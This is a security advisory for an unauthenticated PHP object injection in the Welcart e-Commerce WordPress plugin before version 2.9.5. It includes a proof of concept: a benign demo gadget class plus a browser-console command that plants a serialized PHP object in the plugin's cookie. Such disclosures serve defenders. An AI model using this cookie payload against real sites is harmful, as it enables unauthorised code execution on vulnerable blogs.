WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection

Description

The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then execute the command below in the web developer console of the browser when on the blog as unauthenticated:

document.cookie='usces_cookie=O:4:"Evil":0:{}'

Refresh the page to see the 'Arbitrary deserialization' message displayed

Affects Plugins

Fixed in 2.9.5

References

Classification

Type
OBJECT INJECTION
CWE
CVSS

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-11-10 (about 6 months ago)
Added
2023-11-10 (about 6 months ago)
Last Updated
2023-11-10 (about 6 months ago)

Other